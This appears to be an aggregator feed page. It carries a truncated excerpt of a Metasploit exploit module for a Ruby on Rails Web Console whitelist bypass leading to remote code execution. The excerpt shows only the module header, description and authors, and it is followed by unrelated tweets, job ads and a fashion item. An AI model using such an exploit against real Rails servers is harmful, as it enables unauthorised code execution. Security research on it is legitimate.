23 Mar '17, 3pm

Ruby on Rails 4.0.x / 4.1.x / 4.2.x Whitelist Bypass Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution', 'Description' => %q{ This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. }, 'Author' => [ 'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure 'Ben Murphy <[email protected]>', # Discovery & disclosure 'hdm' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE...

Full article: https://cxsecurity.com/issue/WLB-2017030204

Tweets

Ruby on Rails Web App web host finalization by ...

freelancer.com 24 Mar '17, 12pm

Welcome to Orange Techsol IT Software Solution, Orange Techsol is a certified IT company based in India and has been in th...

Ruby on Rails Code Camp Student Edition conduct...

facebook.com 25 Mar '17, 1am

To help personalize content, tailor and measure ads, and provide a safer experience, we use cookies. By clicking or naviga...

Steve Harrington Links up With KITH and Nike on T-Shirt Collection

Steve Harrington Links up With KITH and Nike on...

hypebeast.com 25 Mar '17, 11am

Ronnie Fieg took to Instagram to announce that KITH will be teaming up with artist Steve Harrington on a collection of T-s...

Hey! Just in Full-stack Ruby on Rails Developer...

landing.jobs 27 Mar '17, 3pm

We're looking for a full time Rails developer to join our engineering team to help build out our web product and UI for ou...

Ad-hoc Ruby-on-Rails support by tomcameron

freelancer.com 24 Mar '17, 11pm

Ad-hoc Ruby-on-Rails work, mostly backend updates from time to time. Likely to be small bursts of work over many months. A...

#propertyjobs Ruby Developer: Creative Problem-...

Ruby Software Developer: Creative Problem-Solver in Code – Elixir training provided – London – £50-85k + Bonus This is a j...